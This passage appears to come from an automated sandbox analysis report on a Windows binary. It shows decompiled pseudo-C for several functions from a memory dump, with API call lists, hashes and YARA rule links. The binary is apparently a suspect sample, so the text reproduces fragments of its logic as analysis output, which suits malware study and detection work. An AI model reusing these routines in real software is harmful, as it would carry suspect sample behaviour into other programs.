						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0xfca2c4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E00FC2A03(_v20);
							if(_v8 == 0) {
								_v8 = E00FC6589(_v24, _t64);
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}

0x00fc4684
0x00fc4687
0x00fc4690
0x00fc4693
0x00fc4696
0x00fc469e
0x00fc479c
0x00fc47a7
0x00fc47aa
0x00fc47b2
0x00fc47b9
0x00fc47b9
0x00fc47ac
0x00fc47af
0x00fc47af
0x00000000
0x00fc47af
0x00fc46a7
0x00000000
0x00000000
0x00fc46b0
0x00fc46b1
0x00fc46b3
0x00fc46bc
0x00fc4793
0x00000000
0x00fc4793
0x00fc46c8
0x00fc46cf
0x00fc46d2
0x00fc4781
0x00fc4788
0x00fc4788
0x00fc478e
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc46d8
0x00fc46d8
0x00fc46d8
0x00fc46d8
0x00fc46dd
0x00fc46df
0x00fc46df
0x00fc46ec
0x00fc46f4
0x00000000
0x00000000
0x00fc46f6
0x00fc4703
0x00fc4709
0x00fc4709
0x00fc470c
0x00000000
0x00000000
0x00fc4719
0x00fc472d
0x00fc4763
0x00fc4766
0x00fc4769
0x00fc4771
0x00fc477c
0x00fc477c
0x00000000
0x00fc4771
0x00fc472f
0x00fc4736
0x00fc473e
0x00000000
0x00000000
0x00fc4740
0x00fc474b
0x00fc474e
0x00000000
0x00fc4755
0x00fc4755
0x00000000
0x00fc4755
0x00fc474e
0x00fc4716
0x00000000
0x00fc4758
0x00fc4758
0x00000000

APIs

GetLastError.KERNEL32 ref: 00FC479C

Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A

GetLastError.KERNEL32 ref: 00FC4710
WaitForSingleObject.KERNEL32(00000000), ref: 00FC4720
GetLastError.KERNEL32 ref: 00FC4740

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: 146131b085c7729d8ed67c44d5d37a2ab9da70cef7543a8a85e6f30d476623a5
Instruction ID: 28e489d42794819d85a554e5c8d04ffb88c45f408d57d45a478c5f12e648c98c
Opcode Fuzzy Hash: 146131b085c7729d8ed67c44d5d37a2ab9da70cef7543a8a85e6f30d476623a5
Instruction Fuzzy Hash: F64104B5D0020AEBDF109FA4CA9AEAEBBB9FF05344B24446DE501E7150D731AE40AB10

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4CD5, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00FC4CD5(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xfca2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0xfca2d0; // 0x292d5a8
				_t3 = _t8 + 0xfcb84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E00FC1970(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xfca2d4, 1, 0, _t30);
					E00FC2A03(_t30);
				}
				_t12 =  *0xfca2b4; // 0x2000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E00FC19E7() == 0) {
						_t28 =  *0xfca124( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E00FC63CD(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E00FC7836(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x00fc4cd6
0x00fc4cdd
0x00fc4ce7
0x00fc4ceb
0x00fc4cf1
0x00fc4cfe
0x00fc4d05
0x00fc4d09
0x00fc4d1b
0x00fc4d1d
0x00fc4d1d
0x00fc4d22
0x00fc4d29
0x00fc4d34
0x00fc4d4a
0x00fc4d4e
0x00fc4d50
0x00fc4d55
0x00fc4d55
0x00fc4d62
0x00fc4d66
0x00fc4d6a
0x00000000
0x00000000
0x00fc4d78
0x00fc4d7c
0x00000000
0x00000000
0x00fc4d7c
0x00fc4d66
0x00000000
0x00fc4d7e
0x00fc4d7e
0x00fc4d7e
0x00fc4d84
0x00fc4d86
0x00fc4d86
0x00fc4d90
0x00fc4d94
0x00fc4da6
0x00fc4da6
0x00fc4daa
0x00fc4db0
0x00fc4db0
0x00fc4db3
0x00fc4db5
0x00fc4db8
0x00fc4db8
0x00fc4dbf
0x00fc4dc5
0x00fc4dc5

APIs

Part of subcall function 00FC1970: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00FC3EC5,74666F53,00000000,?,00000000,?,?,00FC2F4F), ref: 00FC19A6
Part of subcall function 00FC1970: lstrcpy.KERNEL32(00000000,00000000), ref: 00FC19CA
Part of subcall function 00FC1970: lstrcat.KERNEL32(00000000,00000000), ref: 00FC19D2

CreateEventA.KERNEL32(00FCA2D4,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00FC7338,?,?,?), ref: 00FC4D14

Part of subcall function 00FC2A03: HeapFree.KERNEL32(00000000,00000000,00FC4072,00000000,?,?,00000000,?,?,?,?,?,?,00FC44AE,00000000), ref: 00FC2A0F

WaitForSingleObject.KERNEL32(00000000,00004E20,00FC7338,00000000,?,00000000,?,00FC7338,?,?,?,?,?,?,?,00FC1C40), ref: 00FC4D72
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00FC7338,?,?,?), ref: 00FC4DA0
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00FC7338,?,?,?), ref: 00FC4DB8

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: fce2894d17a0d981cba3375c87ca9ee312f5d5355026fbd42c1c321ddd6e828e
Instruction ID: 14927055093d2993cf3dd386f04a2599d5c845f27bc6cefc0dd747dedd5a8952
Opcode Fuzzy Hash: fce2894d17a0d981cba3375c87ca9ee312f5d5355026fbd42c1c321ddd6e828e
Instruction Fuzzy Hash: 0921D332E0072B5BD7216BA89F5BF9B72D8AF44720F05022CFD4397295DB74EC00A694

Uniqueness

Uniqueness Score: -1.00%

Function 00FC7289, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00FC7289(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00FC2616(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E00FC28B8(_t23);
						}
					}
					return _t38;
				}
				if(E00FC4380(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xfca2d4, 1, 0,  *0xfca394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00FC7360(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00FC202E(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00FC3EFA(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00FC4CD5( &_v32, _t39);
					goto L13;
				}
			}

0x00fc7289
0x00fc7296
0x00fc729c
0x00fc729d
0x00fc729e
0x00fc729f
0x00fc72a0
0x00fc72a4
0x00fc72b0
0x00fc72b4
0x00fc733c
0x00fc733c
0x00fc733f
0x00fc7341
0x00fc7349
0x00fc734f
0x00fc7352
0x00fc7352
0x00fc734f
0x00fc735d
0x00fc735d
0x00fc72c7
0x00fc72c9
0x00fc72c9
0x00fc72e0
0x00fc72e4
0x00fc72e7
0x00fc72f2
0x00fc72f9
0x00fc72f9
0x00fc7305
0x00fc7306
0x00fc7314
0x00fc7308
0x00fc7308
0x00fc7309
0x00fc730a
0x00fc730b
0x00fc730c
0x00fc730d
0x00fc730d
0x00fc7319
0x00fc731e
0x00fc7320
0x00fc7322
0x00fc7322
0x00fc7329
0x00000000
0x00fc732b
0x00fc732b
0x00fc7338
0x00000000
0x00fc7338

APIs

CreateEventA.KERNEL32(00FCA2D4,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,00FC1C40,?,00000001), ref: 00FC72DA
SetEvent.KERNEL32(00000000,?,?,?,?,00FC1C40,?,00000001,00FC2F7D,00000002,?,?,00FC2F7D), ref: 00FC72E7
Sleep.KERNEL32(00000BB8,?,?,?,?,00FC1C40,?,00000001,00FC2F7D,00000002,?,?,00FC2F7D), ref: 00FC72F2
CloseHandle.KERNEL32(00000000,?,?,?,?,00FC1C40,?,00000001,00FC2F7D,00000002,?,?,00FC2F7D), ref: 00FC72F9

Part of subcall function 00FC7360: WaitForSingleObject.KERNEL32(00000000,?,?,?,00FC7319,?,00FC7319,?,?,?,?,?,00FC7319,?), ref: 00FC743A
Part of subcall function 00FC7360: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00FC7319,?,?,?,?,?,00FC1C40,?), ref: 00FC7462

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: 372642618bc90ea6886eb563816e20a92ff511be2c9eab072d5af4d674cdbad7
Instruction ID: 2bf8c30b4023ef827399fd46ef920feaec7555a5d323a8fad46d4088d1edd216
Opcode Fuzzy Hash: 372642618bc90ea6886eb563816e20a92ff511be2c9eab072d5af4d674cdbad7
Instruction Fuzzy Hash: CA21A132D0425BABCB20BFB48E87EDE7779AB44360B04442DFA11A7140D774A901BFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4138, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00FC4138(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xfca290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xfca2a8; // 0x2f4f5b36
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xfca2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00fc4140
0x00fc4143
0x00fc4149
0x00fc4161
0x00fc4165
0x00fc4168
0x00fc416a
0x00fc416d
0x00fc416f
0x00fc4172
0x00fc4174
0x00fc4174
0x00fc4176
0x00fc4181
0x00fc4186
0x00fc4197
0x00fc419f
0x00fc41a4
0x00fc41a7
0x00fc41aa
0x00fc41ac
0x00fc41b2
0x00fc41b5
0x00fc41b5
0x00fc41b5
0x00fc41c0
0x00fc41c5
0x00fc41cf

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00FC5B76,00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC4143
RtlAllocateHeap.NTDLL(00000000,?), ref: 00FC415B
memcpy.NTDLL(00000000,038F9630,-00000008,?,?,?,00FC5B76,00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC419F
memcpy.NTDLL(00000001,038F9630,00000001,00FC6301,00000000,038F9630), ref: 00FC41C0

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 8944bfcc7d5beb33b95edd5e23a876bfdf337341fc3548b1958861b322c36b4e
Instruction ID: 11a45d3c8e1d4b2bd1403440eb7b2cf1f64a6ce27e8019b3915b39a8cb64f3a7
Opcode Fuzzy Hash: 8944bfcc7d5beb33b95edd5e23a876bfdf337341fc3548b1958861b322c36b4e
Instruction Fuzzy Hash: AB110672A0021DAFC711CB69DD8AE9EBBBEEB94360B15016AF40497150E671AE44A760

Uniqueness

Uniqueness Score: -1.00%

Function 00FC49BA, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00FC49BA(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00FC5C4E(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xfc92c4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xfc92c4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x00fc49c5
0x00fc49c9
0x00fc49cb
0x00fc49cc
0x00fc49d4
0x00fc49d4
0x00fc49d8
0x00000000
0x00000000
0x00fc49cf
0x00fc49d0
0x00fc49d3
0x00fc49d3
0x00fc49e0
0x00fc49e7
0x00fc49eb
0x00fc49f3
0x00fc49f9
0x00fc49fb
0x00fc4a00
0x00fc4a04
0x00fc4a06
0x00fc4a09
0x00fc4a10
0x00fc4a10
0x00fc4a1a
0x00fc4a1d
0x00fc4a20
0x00fc4a20
0x00fc4a2c
0x00fc4a2c
0x00fc4a39

APIs

StrChrA.SHLWAPI(?,00000020,00000000,038F962C,?,?,?,00FC6072,038F962C,?,?,00FC2F44), ref: 00FC49D4
StrTrimA.SHLWAPI(?,00FC92C4,00000002,?,?,?,00FC6072,038F962C,?,?,00FC2F44), ref: 00FC49F3
StrChrA.SHLWAPI(?,00000020,?,?,?,00FC6072,038F962C,?,?,00FC2F44,?,?,?,?,?,00FC44F9), ref: 00FC49FE
StrTrimA.SHLWAPI(00000001,00FC92C4,?,?,?,00FC6072,038F962C,?,?,00FC2F44,?,?,?,?,?,00FC44F9), ref: 00FC4A10

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: d01298d9b69856ec2234d679e5df01939996101a6f136bf8ad02ac308713f681
Instruction ID: d98b1447f78e3c2217ac175a6ec4b96642be26739c67ad1f213bfefbd472adec
Opcode Fuzzy Hash: d01298d9b69856ec2234d679e5df01939996101a6f136bf8ad02ac308713f681
Instruction Fuzzy Hash: 56012D71A443276FD321CF158D4BF277E98EB85B64F11050CF581C7280D774EC01A6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1970, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00FC1970(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E00FC354E(_t8, _t1);
				_t16 = E00FC5C4E(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E00FC756E(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00FC5C4E(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00FC2A03(_t16);
				}
				return _t18;
			}

0x00fc197b
0x00fc197c
0x00fc197f
0x00fc1981
0x00fc198c
0x00fc1990
0x00fc1995
0x00fc1999
0x00fc19a1
0x00fc19a6
0x00fc19ae
0x00fc19ae
0x00fc19b7
0x00fc19bb
0x00fc19c1
0x00fc19c4
0x00fc19ca
0x00fc19ca
0x00fc19d2
0x00fc19d2
0x00fc19d9
0x00fc19d9
0x00fc19e4

APIs

Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A

Part of subcall function 00FC756E: wsprintfA.USER32 ref: 00FC75CA

lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00FC3EC5,74666F53,00000000,?,00000000,?,?,00FC2F4F), ref: 00FC19A6
lstrcpy.KERNEL32(00000000,00000000), ref: 00FC19CA
lstrcat.KERNEL32(00000000,00000000), ref: 00FC19D2

Strings

Soft, xrefs: 00FC197C, 00FC1995

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: 73c99f15c0cfc524b6f6678c57432babb72e6a142edc0f2c81badb9738d81a9a
Instruction ID: 98ccc357d2b37d1c9e64de6c23ecb74c0ab451e4d173618f84ebfc1742cf6548
Opcode Fuzzy Hash: 73c99f15c0cfc524b6f6678c57432babb72e6a142edc0f2c81badb9738d81a9a
Instruction Fuzzy Hash: 3601F23250020FA7CB227B758E8AFEF3A6CAF81354F044029F90456102DB788955E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6027, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00FC6027(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xfca37c; // 0x38f9630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xfca37c; // 0x38f9630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xfca030) {
					HeapFree( *0xfca290, 0, _t8);
				}
				_t14[1] = E00FC49BA(_v0, _t14);
				_t11 =  *0xfca37c; // 0x38f9630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x00fc6027
0x00fc6027
0x00fc6030
0x00fc6040
0x00fc6040
0x00fc6045
0x00fc604a
0x00000000
0x00000000
0x00fc603a
0x00fc603a
0x00fc604c
0x00fc6050
0x00fc6062
0x00fc6062
0x00fc6072
0x00fc6075
0x00fc607a
0x00fc607e
0x00fc6084

APIs

RtlEnterCriticalSection.NTDLL(038F95F0), ref: 00FC6030
Sleep.KERNEL32(0000000A,?,?,00FC2F44,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC603A
HeapFree.KERNEL32(00000000,00000000,?,?,00FC2F44,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC6062
RtlLeaveCriticalSection.NTDLL(038F95F0), ref: 00FC607E

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 3839d3b9cdd866ec78c553f05191f227e5b62db89fc662ea550cbe0a0eb46963
Instruction ID: f2c8041f4b5f4d42b7fb8946292a32002f3f60931091b3faa58c43bffd6ee875
Opcode Fuzzy Hash: 3839d3b9cdd866ec78c553f05191f227e5b62db89fc662ea550cbe0a0eb46963
Instruction Fuzzy Hash: 6AF0583068864A9BEB208F38EF4BF1A77A4AB44744B018009F845E7261C231F804FB26

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1547, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC1547() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xfca2c4; // 0x228
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xfca304; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xfca2c4; // 0x228
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xfca290; // 0x3500000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00fc1547
0x00fc154e
0x00fc1598
0x00fc159a
0x00fc159a
0x00fc1552
0x00fc1558
0x00fc155d
0x00fc1561
0x00fc1567
0x00fc156e
0x00000000
0x00000000
0x00fc1570
0x00fc1575
0x00000000
0x00000000
0x00000000
0x00fc1575
0x00fc1577
0x00fc157f
0x00fc1582
0x00fc1582
0x00fc1588
0x00fc158f
0x00fc1592
0x00fc1592
0x00000000

APIs

SetEvent.KERNEL32(00000228,00000001,00FC4214), ref: 00FC1552
SleepEx.KERNEL32(00000064,00000001), ref: 00FC1561
CloseHandle.KERNEL32(00000228), ref: 00FC1582
HeapDestroy.KERNEL32(03500000), ref: 00FC1592

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 426b0947d2612a396f6add1dac0a8092f74bf85156c54142d2f60f75030a16f2
Instruction ID: 5ade383997828fc790ed459ad99e6921c515af31fa0bc1f09dacd4413c183ae8
Opcode Fuzzy Hash: 426b0947d2612a396f6add1dac0a8092f74bf85156c54142d2f60f75030a16f2
Instruction Fuzzy Hash: 56F03031F8431E9BE7205B34AF0FF5A37ACBB56725B080918B81AD3191CB75D920B551

Uniqueness

Uniqueness Score: -1.00%

Function 00FC461D, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00FC461D() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xfca37c; // 0x38f9630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xfca37c; // 0x38f9630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xfca37c; // 0x38f9630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xfcb882) {
					HeapFree( *0xfca290, 0, _t10);
					_t7 =  *0xfca37c; // 0x38f9630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00fc461d
0x00fc4626
0x00fc4636
0x00fc4636
0x00fc463b
0x00fc4640
0x00000000
0x00000000
0x00fc4630
0x00fc4630
0x00fc4642
0x00fc4647
0x00fc464b
0x00fc465e
0x00fc4664
0x00fc4664
0x00fc466d
0x00fc466f
0x00fc4673
0x00fc4679

APIs

RtlEnterCriticalSection.NTDLL(038F95F0), ref: 00FC4626
Sleep.KERNEL32(0000000A,?,?,00FC2F44,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC4630
HeapFree.KERNEL32(00000000,?,?,?,00FC2F44,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC465E
RtlLeaveCriticalSection.NTDLL(038F95F0), ref: 00FC4673

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
